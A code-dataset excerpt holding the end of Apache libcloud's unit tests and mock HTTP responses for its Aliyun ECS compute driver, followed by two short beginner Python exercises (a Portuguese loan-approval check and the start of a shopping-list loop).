\"instance_id\": \"\",\n \"device\": \"\",\n \"delete_with_instance\": False,\n \"enable_auto_snapshot\": False,\n \"creation_time\": \"2014-07-23T02:44:07Z\",\n \"attached_time\": \"2014-07-23T07:47:35Z\",\n \"detached_time\": \"2014-07-23T08:28:48Z\",\n \"disk_charge_type\": \"PostPaid\",\n \"operation_locks\": {\"lock_reason\": None},\n }\n self._validate_extras(expected_extras, volume.extra)\n volume = volumes[1]\n self.assertEqual(\"d-28zfrmo13\", volume.id)\n self.assertEqual(\"ubuntu1404sys\", volume.name)\n self.assertEqual(5, volume.size)\n self.assertEqual(StorageVolumeState.INUSE, volume.state)\n expected_extras = {\n \"region_id\": \"cn-qingdao\",\n \"zone_id\": \"cn-qingdao-b\",\n \"description\": \"Description\",\n \"type\": \"system\",\n \"category\": \"cloud\",\n \"image_id\": \"ubuntu1404_64_20G_aliaegis_20150325.vhd\",\n \"source_snapshot_id\": \"\",\n \"product_code\": \"\",\n \"portable\": False,\n \"instance_id\": \"i-28whl2nj2\",\n \"device\": \"/dev/xvda\",\n \"delete_with_instance\": True,\n \"enable_auto_snapshot\": True,\n \"creation_time\": \"2014-07-23T02:44:06Z\",\n \"attached_time\": \"2016-01-04T15:02:17Z\",\n \"detached_time\": \"\",\n \"disk_charge_type\": \"PostPaid\",\n \"operation_locks\": {\"lock_reason\": None},\n }\n self._validate_extras(expected_extras, volume.extra)\n\n def test_list_volumes_with_ex_volume_ids(self):\n ECSMockHttp.type = \"list_volumes_ex_volume_ids\"\n volumes = self.driver.list_volumes(ex_volume_ids=[\"i-28n7dkvov\", \"not-existed-id\"])\n self.assertIsNotNone(volumes)\n\n def test_list_volumes_with_ex_filters(self):\n ECSMockHttp.type = \"list_volumes_ex_filters\"\n ex_filters = {\"InstanceId\": self.fake_node.id}\n volumes = self.driver.list_volumes(ex_filters=ex_filters)\n self.assertIsNotNone(volumes)\n\n def test_list_volume_snapshots(self):\n snapshots = self.driver.list_volume_snapshots(self.fake_volume)\n self.assertEqual(1, len(snapshots))\n\n def test_list_volume_snapshots_with_ex_snapshot_ids(self):\n ECSMockHttp.type = \"list_volume_snapshots_ex_snapshot_ids\"\n ex_snapshot_ids = [\"fake-snapshot1\"]\n self.driver.list_volume_snapshots(self.fake_volume, ex_snapshot_ids=ex_snapshot_ids)\n\n def test_list_volume_snapshots_with_ex_filters(self):\n ECSMockHttp.type = \"list_volume_snapshots_ex_filters\"\n ex_filters = {\"InstanceId\": self.fake_node.id}\n self.driver.list_volume_snapshots(self.fake_volume, ex_filters=ex_filters)\n\n def test_create_volume(self):\n ECSMockHttp.type = \"create_volume\"\n self.volume_size = 1\n self.volume_name = \"fake-volume-name\"\n self.description = \"fake-description\"\n self.disk_category = \"system\"\n self.client_token = \"client_token\"\n volume = self.driver.create_volume(\n self.volume_size,\n self.volume_name,\n snapshot=self.fake_snapshot,\n ex_zone_id=self.zone,\n ex_description=self.description,\n ex_disk_category=self.disk_category,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(volume)\n\n def test_create_volume_without_ex_zone_id_exception(self):\n self.assertRaises(AttributeError, self.driver.create_volume, 1, \"fake-volume-name\")\n\n def test_create_volume_snapshot(self):\n ECSMockHttp.type = \"create_volume_snapshot\"\n self.snapshot_name = \"fake-snapshot1\"\n self.description = \"fake-description\"\n self.client_token = \"client-token\"\n snapshot = self.driver.create_volume_snapshot(\n self.fake_volume,\n name=self.snapshot_name,\n ex_description=self.description,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(snapshot)\n\n def test_attach_volume(self):\n self.device = \"/dev/sdb\"\n self.delete_with_instance = True\n attached = self.driver.attach_volume(\n self.fake_node,\n self.fake_volume,\n device=self.device,\n ex_delete_with_instance=self.delete_with_instance,\n )\n self.assertTrue(attached)\n\n def test_detach_volume(self):\n self.instance_id = \"fake-node1\"\n result = self.driver.detach_volume(self.fake_volume, ex_instance_id=self.instance_id)\n self.assertTrue(result)\n\n def test_detach_volume_query_instance_id(self):\n ECSMockHttp.type = \"detach_volume\"\n result = self.driver.detach_volume(self.fake_volume)\n self.assertTrue(result)\n\n def test_detach_volume_query_instance_id_exception(self):\n self.assertRaises(AttributeError, self.driver.detach_volume, self.fake_volume)\n\n def test_destroy_volume(self):\n ECSMockHttp.type = \"destroy_volume\"\n result = self.driver.destroy_volume(self.fake_volume)\n self.assertTrue(result)\n\n def test_destroy_volume_query_volumes_exception(self):\n self.assertRaises(LibcloudError, self.driver.destroy_volume, self.fake_volume)\n\n def test_destroy_volume_state_exception(self):\n ECSMockHttp.type = \"destroy_volume_state\"\n self.assertRaises(LibcloudError, self.driver.destroy_volume, self.fake_volume)\n\n def test_destroy_volume_snapshot(self):\n result = self.driver.destroy_volume_snapshot(self.fake_snapshot)\n self.assertTrue(result)\n\n def test_destroy_volume_snapshot_exception(self):\n self.assertRaises(AttributeError, self.driver.destroy_volume_snapshot, self.fake_volume)\n\n def test_list_images(self):\n images = self.driver.list_images(self.fake_location)\n self.assertEqual(1, len(images))\n image = images[0]\n self.assertEqual(\"freebsd1001_64_20G_aliaegis_20150527.vhd\", image.id)\n self.assertEqual(\"freebsd1001_64_20G_aliaegis_20150527.vhd\", image.name)\n expected_extra = {\n \"image_version\": \"1.0.0\",\n \"os_type\": \"linux\",\n \"platform\": \"Freebsd\",\n \"architecture\": \"x86_64\",\n \"description\": \"freebsd1001_64_20G_aliaegis_20150527.vhd\",\n \"size\": 20,\n \"image_owner_alias\": \"system\",\n \"os_name\": \"FreeBSD 10.1 64位\",\n \"product_code\": \"\",\n \"is_subscribed\": False,\n \"progress\": \"100%\",\n \"creation_time\": \"2015-06-19T07:25:42Z\",\n \"usage\": \"instance\",\n \"is_copied\": False,\n }\n self._validate_extras(expected_extra, image.extra)\n expected_dev_mappings = {\n \"snapshot_id\": \"\",\n \"size\": 20,\n \"device\": \"/dev/xvda\",\n \"format\": \"\",\n \"import_oss_bucket\": \"\",\n \"import_oss_object\": \"\",\n }\n self._validate_extras(expected_dev_mappings, image.extra[\"disk_device_mappings\"])\n\n def test_list_images_with_ex_image_ids(self):\n ECSMockHttp.type = \"list_images_ex_image_ids\"\n self.driver.list_images(\n location=self.fake_location,\n ex_image_ids=[self.fake_image.id, \"not-existed\"],\n )\n\n def test_list_images_with_ex_image_ids_type_exception(self):\n self.assertRaises(\n AttributeError,\n self.driver.list_images,\n location=self.fake_location,\n ex_image_ids={\"image_ids\": \"id1,id2\"},\n )\n\n def test_list_images_with_ex_filters(self):\n ECSMockHttp.type = \"list_images_ex_filters\"\n ex_filters = {\"Status\": \"Available\"}\n self.driver.list_images(location=self.fake_location, ex_filters=ex_filters)\n\n def test_list_images_multiple_pages(self):\n ECSMockHttp.type = \"list_images_pages\"\n images = self.driver.list_images()\n self.assertEqual(2, len(images))\n\n def test_create_image(self):\n self.image_name = \"fake-image1\"\n self.description = \"description\"\n self.image_version = \"1.0.0\"\n self.client_token = \"client_token\"\n image = self.driver.create_image(\n None,\n self.image_name,\n self.description,\n ex_snapshot_id=self.fake_snapshot.id,\n ex_image_version=self.image_version,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(image)\n\n def test_creaet_image_exception(self):\n self.assertRaises(AttributeError, self.driver.create_image, None, None)\n\n def test_delete_image(self):\n result = self.driver.delete_image(self.fake_image)\n self.assertTrue(result)\n\n def test_get_image(self):\n ECSMockHttp.type = \"get_image\"\n image = self.driver.get_image(self.fake_image.id)\n self.assertIsNotNone(image)\n\n def test_get_image_not_found_exception(self):\n ECSMockHttp.type = \"get_image_not_found\"\n self.assertRaises(LibcloudError, self.driver.get_image, self.fake_image.id)\n\n def test_copy_image(self):\n self.image_name = \"copied-image1\"\n self.description = \"description\"\n self.dest_region = \"cn-hangzhou\"\n self.client_token = \"client-token\"\n image = self.driver.copy_image(\n self.region,\n self.fake_image,\n self.image_name,\n description=self.description,\n ex_destination_region_id=self.dest_region,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(image)\n\n def test_copy_image_in_the_same_region(self):\n ECSMockHttp.type = \"copy_image_same_region\"\n image = self.driver.copy_image(self.region, self.fake_image, None)\n self.assertIsNotNone(image)\n\n def test_ex_create_security_group(self):\n self.sg_description = \"description\"\n self.client_token = \"client-token\"\n sg_id = self.driver.ex_create_security_group(\n description=self.sg_description, client_token=self.client_token\n )\n self.assertEqual(\"sg-F876FF7BA\", sg_id)\n\n def test_ex_list_security_groups(self):\n sgs = self.driver.ex_list_security_groups()\n self.assertEqual(1, len(sgs))\n sg = sgs[0]\n self.assertEqual(\"sg-28ou0f3xa\", sg.id)\n self.assertEqual(\"sg-28ou0f3xa\", sg.name)\n self.assertEqual(\"System created security group.\", sg.description)\n self.assertEqual(\"\", sg.vpc_id)\n self.assertEqual(\"2015-06-26T08:35:30Z\", sg.creation_time)\n\n def test_ex_join_security_group(self):\n result = self.driver.ex_join_security_group(\n self.fake_node, group_id=self.fake_security_group_id\n )\n self.assertTrue(result)\n\n def test_ex_leave_security_group(self):\n result = self.driver.ex_leave_security_group(\n self.fake_node, group_id=self.fake_security_group_id\n )\n self.assertTrue(result)\n\n def test_ex_delete_security_group_by_id(self):\n result = self.driver.ex_delete_security_group_by_id(group_id=self.fake_security_group_id)\n self.assertTrue(result)\n\n def test_ex_modify_security_group_by_id(self):\n self.sg_name = \"name\"\n self.sg_description = \"description\"\n result = self.driver.ex_modify_security_group_by_id(\n group_id=self.fake_security_group_id,\n name=self.sg_name,\n description=self.sg_description,\n )\n self.assertTrue(result)\n\n def test_ex_list_security_groups_with_ex_filters(self):\n ECSMockHttp.type = \"list_sgs_filters\"\n self.vpc_id = \"vpc1\"\n ex_filters = {\"VpcId\": self.vpc_id}\n sgs = self.driver.ex_list_security_groups(ex_filters=ex_filters)\n self.assertEqual(1, len(sgs))\n\n def test_ex_list_security_group_attributes(self):\n self.sga_nictype = \"internet\"\n sgas = self.driver.ex_list_security_group_attributes(\n group_id=self.fake_security_group_id, nic_type=self.sga_nictype\n )\n self.assertEqual(1, len(sgas))\n sga = sgas[0]\n self.assertEqual(\"ALL\", sga.ip_protocol)\n self.assertEqual(\"-1/-1\", sga.port_range)\n self.assertEqual(\"Accept\", sga.policy)\n self.assertEqual(\"internet\", sga.nic_type)\n\n def test_ex_list_zones(self):\n zones = self.driver.ex_list_zones()\n self.assertEqual(1, len(zones))\n zone = zones[0]\n self.assertEqual(\"cn-qingdao-b\", zone.id)\n self.assertEqual(self.driver, zone.driver)\n self.assertEqual(\"青岛可用区B\", zone.name)\n self.assertIsNotNone(zone.available_resource_types)\n self.assertEqual(\"IoOptimized\", zone.available_resource_types[0])\n self.assertIsNotNone(zone.available_instance_types)\n self.assertEqual(\"ecs.m2.medium\", zone.available_instance_types[0])\n self.assertIsNotNone(zone.available_disk_categories)\n self.assertEqual(\"cloud_ssd\", zone.available_disk_categories[0])\n\n\nclass ECSMockHttp(MockHttp):\n fixtures = ComputeFileFixtures(\"ecs\")\n\n def _DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_nodes_ex_node_ids_DescribeInstances(self, method, url, body, headers):\n params = {\"InstanceIds\": '[\"i-28n7dkvov\", \"not-existed-id\"]'}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _list_nodes_ex_filters_DescribeInstances(self, method, url, body, headers):\n params = {\"ZoneId\": self.test.zone}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _DescribeInstanceTypes(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_instance_types.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeRegions(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_regions.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_CreateInstance(self, method, url, body, headers):\n params = {\n \"SecurityGroupId\": \"sg-28ou0f3xa\",\n \"Description\": \"description\",\n \"InternetChargeType\": \"PayByTraffic\",\n \"InternetMaxBandwidthOut\": \"1\",\n \"InternetMaxBandwidthIn\": \"200\",\n \"HostName\": \"hostname\",\n \"Password\": \"password\",\n \"IoOptimized\": \"optimized\",\n \"SystemDisk.Category\": \"cloud\",\n \"SystemDisk.DiskName\": \"root\",\n \"SystemDisk.Description\": \"sys\",\n \"VSwitchId\": \"vswitch-id1\",\n \"PrivateIpAddress\": \"1.1.1.2\",\n \"ClientToken\": \"client_token\",\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_StartInstance(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_CreateInstance(self, method, url, body, headers):\n params = {\n \"SecurityGroupId\": \"sg-28ou0f3xa\",\n \"DataDisk.1.Size\": \"5\",\n \"DataDisk.1.Category\": \"cloud\",\n \"DataDisk.1.DiskName\": \"data1\",\n \"DataDisk.1.Description\": \"description\",\n \"DataDisk.1.Device\": \"/dev/xvdb\",\n \"DataDisk.1.DeleteWithInstance\": \"true\",\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_StartInstance(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_RebootInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"false\"})\n resp_body = self.fixtures.load(\"reboot_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_force_stop_RebootInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"true\"})\n resp_body = self.fixtures.load(\"reboot_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_force_stop_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"destroy_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_node_DeleteInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id})\n resp_body = self.fixtures.load(\"delete_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _start_node_StartInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id})\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _start_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_StopInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"false\"})\n resp_body = self.fixtures.load(\"stop_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"stop_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_force_stop_StopInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"true\"})\n resp_body = self.fixtures.load(\"stop_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_force_stop_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"stop_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeDisks(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_volumes_ex_volume_ids_DescribeDisks(self, method, url, body, headers):\n region = self.test.region\n params = {\"DiskIds\": '[\"i-28n7dkvov\", \"not-existed-id\"]', \"RegionId\": region}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _list_volumes_ex_filters_DescribeDisks(self, method, url, body, headers):\n params = {\"InstanceId\": self.test.fake_node.id}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeDisks(method, url, body, headers)\n\n def _DescribeSnapshots(self, method, url, body, headers):\n region = self.test.region\n volume_id = self.test.fake_volume.id\n params = {\"RegionId\": region, \"DiskId\": volume_id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_snapshots.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_volume_snapshots_ex_snapshot_ids_DescribeSnapshots(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"SnapshotIds\": '[\"fake-snapshot1\"]'}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeSnapshots(method, url, body, headers)\n\n def _list_volume_snapshots_ex_filters_DescribeSnapshots(self, method, url, body, headers):\n params = {\"InstanceId\": self.test.fake_node.id}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeSnapshots(method, url, body, headers)\n\n def _create_volume_CreateDisk(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"DiskName\": self.test.volume_name,\n \"Size\": str(self.test.volume_size),\n \"ZoneId\": self.test.zone,\n \"SnapshotId\": self.test.fake_snapshot.id,\n \"Description\": self.test.description,\n \"DiskCategory\": self.test.disk_category,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_DescribeDisks(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_snapshot_CreateSnapshot(self, method, url, body, headers):\n params = {\n \"DiskId\": self.test.fake_volume.id,\n \"SnapshotName\": self.test.snapshot_name,\n \"Description\": self.test.description,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_snapshot.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_snapshot_DescribeSnapshots(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_snapshots.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _AttachDisk(self, method, url, body, headers):\n delete_with_instance = str(self.test.delete_with_instance).lower()\n params = {\n \"InstanceId\": self.test.fake_node.id,\n \"DiskId\": self.test.fake_volume.id,\n \"Device\": self.test.device,\n \"DeleteWithInstance\": delete_with_instance,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"attach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DetachDisk(self, method, url, body, headers):\n params = {\n \"DiskId\": self.test.fake_volume.id,\n \"InstanceId\": self.test.instance_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _detach_volume_DescribeDisks(self, method, url, body, headers):\n params = {\"DiskIds\": '[\"' + self.test.fake_volume.id + '\"]'}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _detach_volume_DetachDisk(self, method, url, body, headers):\n params = {\"DiskId\": self.test.fake_volume.id, \"InstanceId\": \"i-28whl2nj2\"}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_DescribeDisks(self, method, url, body, headers):\n params = {\"DiskIds\": '[\"' + self.test.fake_volume.id + '\"]'}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"destroy_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_DeleteDisk(self, method, url, body, headers):\n params = {\"DiskId\": self.test.fake_volume.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_state_DescribeDisks(self, method, url, body, headers):\n return self._detach_volume_DescribeDisks(method, url, body, headers)\n\n def _DeleteSnapshot(self, method, url, body, header):\n params = {\"SnapshotId\": self.test.fake_snapshot.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_snapshot.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.fake_location.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_images_pages_DescribeImages(self, method, url, body, headers):\n if \"PageNumber=2\" in url:\n resp_body = self.fixtures.load(\"pages_describe_images_page2.xml\")\n else:\n resp_body = self.fixtures.load(\"pages_describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_images_ex_image_ids_DescribeImages(self, method, url, body, headers):\n params = {\"ImageId\": self.test.fake_image.id + \",not-existed\"}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeImages(method, url, body, headers)\n\n def _list_images_ex_filters_DescribeImages(self, method, url, body, headers):\n params = {\"Status\": \"Available\"}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeImages(method, url, body, headers)\n\n def _CreateImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageName\": self.test.image_name,\n \"Description\": self.test.description,\n \"SnapshotId\": self.test.fake_snapshot.id,\n \"ImageVersion\": self.test.image_version,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DeleteImage(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _get_image_DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _get_image_not_found_DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"get_image_describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _CopyImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageId\": self.test.fake_image.id,\n \"DestinationRegionId\": self.test.dest_region,\n \"DestinationImageName\": self.test.image_name,\n \"DestinationDescription\": self.test.description,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"copy_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _copy_image_same_region_CopyImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageId\": self.test.fake_image.id,\n \"DestinationRegionId\": self.test.region,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"copy_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _copy_image_same_region_DescribeImages(self, method, url, body, headers):\n return self._DescribeImages(method, url, body, headers)\n\n def _DescribeSecurityGroups(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_security_groups.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _JoinSecurityGroup(self, method, url, body, headers):\n params = {\n \"InstanceId\": self.test.fake_node.id,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n body = self.fixtures.load(\"join_security_group_by_id.xml\")\n return (httplib.OK, body, {}, httplib.responses[httplib.OK])\n\n def _LeaveSecurityGroup(self, method, url, body, headers):\n params = {\n \"InstanceId\": self.test.fake_node.id,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n body = self.fixtures.load(\"leave_security_group_by_id.xml\")\n return (httplib.OK, body, {}, httplib.responses[httplib.OK])\n\n def _list_sgs_filters_DescribeSecurityGroups(self, method, url, body, headers):\n params = {\"VpcId\": self.test.vpc_id}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeSecurityGroups(method, url, body, headers)\n\n def _CreateSecurityGroup(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"Description\": self.test.sg_description,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_security_group.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DeleteSecurityGroup(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_security_group_by_id.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _ModifySecurityGroupAttribute(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n \"SecurityGroupName\": self.test.sg_name,\n \"Description\": self.test.sg_description,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"modify_security_group_by_id.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeSecurityGroupAttribute(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n \"NicType\": self.test.sga_nictype,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_security_group_attributes.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeZones(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_zones.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_public_ip_AllocatePublicIpAddress(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_public_ip.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n\nif __name__ == \"__main__\":\n sys.exit(unittest.main())\n","repo_name":"apache/libcloud","sub_path":"libcloud/test/compute/test_ecs.py","file_name":"test_ecs.py","file_ext":"py","file_size_in_byte":44872,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"74018541228","text":"'''\n09 - Leia o sálario de um trabalhador e o valor da prestação de um empréstimo. Se a prestação\nfor maior que 20% do salário imprima: Emprestimo não concedido, caso contrário imprima: Emprestimo Concedido;\n'''\n\nsal = float(input('Sálario: '))\nparc = float(input('Parcela: '))\n\nporcent = sal * 20 / 100\n\nprint(f'20% do salário informado é R$ {porcent:.0f}')\n\nif porcent == parc or porcent > parc:\n print('Emprestimo Concedido')\nelse:\n print('Emprestimo Negado')","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 5/Exercicios/EX09.py","file_name":"EX09.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1266487949","text":"#While you loop through each item of food, only add the \n#price of the item to total if the item's stock count is greater than zero.\n\n#if the item is in stock and after you add the price to the total, \n#subtract one from the item's stock count.\n\nshopping_list = [\"banana\", \"orange\", 